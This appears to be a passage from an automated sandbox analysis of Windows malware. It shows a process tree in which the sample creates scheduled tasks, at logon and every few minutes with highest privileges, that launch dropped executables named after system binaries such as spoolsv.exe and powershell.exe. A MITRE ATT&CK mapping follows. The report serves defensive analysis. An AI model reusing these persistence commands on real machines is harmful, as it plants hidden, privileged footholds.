- Creates scheduled task(s)
PID:3156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dialer" /sc ONLOGON /tr "'C:\Users\Default User\dialer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dialerd" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\dialer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Windows\Containers\serviced\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Windows\Containers\serviced\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\comagentwin\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\comagentwin\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 7 /tr "'C:\comagentwin\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MssurrogateMonitorM" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\MssurrogateMonitor.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MssurrogateMonitor" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\MssurrogateMonitor.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MssurrogateMonitorM" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\MssurrogateMonitor.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:3820
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 428 -p 2128 -ip 2128
  2⤵
  PID:324
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 404 -p 3692 -ip 3692
  2⤵
  PID:1196
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 464 -p 3564 -ip 3564
  2⤵
  PID:4816
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 632 -p 5060 -ip 5060
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:3048

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
1⤵
PID:3868

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
1⤵
PID:2372

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops file in System32 directory
PID:5060
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 5060 -s 764
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:4932

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Change Default File Association

T1042

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Modify Registry

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

System Information Discovery